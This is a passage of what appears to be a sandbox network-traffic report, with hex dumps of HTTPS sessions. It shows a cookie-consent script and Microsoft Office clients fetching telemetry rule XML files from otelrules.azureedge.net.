                                                                                                                                                                              2024-11-21 07:30:57 UTC711INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                                                                                                              Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                                                                                                              2024-11-21 07:30:57 UTC16383INData Raw: 61 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f
                                                                                                                                                                              Data Ascii: a-label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mo
                                                                                                                                                                              2024-11-21 07:30:57 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                              Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                              2024-11-21 07:30:57 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                              Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              103192.168.2.64983413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:57 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:57 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                              ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                              x-ms-request-id: 1a87898e-001e-002b-2066-3b99f2000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073057Z-178bfbc474bscnbchC1NYCe7eg000000015g00000000meep
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:57 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              104192.168.2.64983813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:57 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:57 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                              ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                              x-ms-request-id: aaf9eac1-201e-0000-4977-3ba537000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073057Z-1777c6cb754lv4cqhC1TEB13us0000000av0000000002dmc
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:57 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              105192.168.2.64983513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:57 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:57 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                              ETag: "0x8DC582BE6431446"
                                                                                                                                                                              x-ms-request-id: 3a8ea751-101e-007a-417b-3b047e000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073057Z-178bfbc474bbcwv4hC1NYCypys00000000z000000000b3yr
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:57 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              106192.168.2.64984013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:58 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:59 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:58 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                              ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                              x-ms-request-id: 610e5600-501e-005b-46b5-3bd7f7000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073058Z-r1d97b99577mrt4rhC1TEBftkc00000009yg000000006mab
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:59 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              107192.168.2.64983913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:58 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:58 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                              ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                              x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073058Z-r1d97b99577hsvhhhC1TEByb1w000000046g00000000h7at
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:59 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              108192.168.2.64984513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:59 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:00 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                              ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                              x-ms-request-id: 538e08fd-a01e-0032-4b7d-3b1949000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073100Z-1777c6cb754dqf99hC1TEB5nps0000000ap0000000005urt
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:00 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              109192.168.2.64984213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:59 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:00 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1352
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                              ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                              x-ms-request-id: c363d474-d01e-0028-1b8c-3a7896000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073100Z-1777c6cb7549x5qchC1TEBggbg0000000ax0000000003cam
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:00 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              110192.168.2.64984613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:59 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:00 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                              ETag: "0x8DC582BDDC22447"
                                                                                                                                                                              x-ms-request-id: 008b0be1-f01e-001f-587c-3b5dc8000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073100Z-1777c6cb754b7tdghC1TEBwwa40000000b0g000000000k7t
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
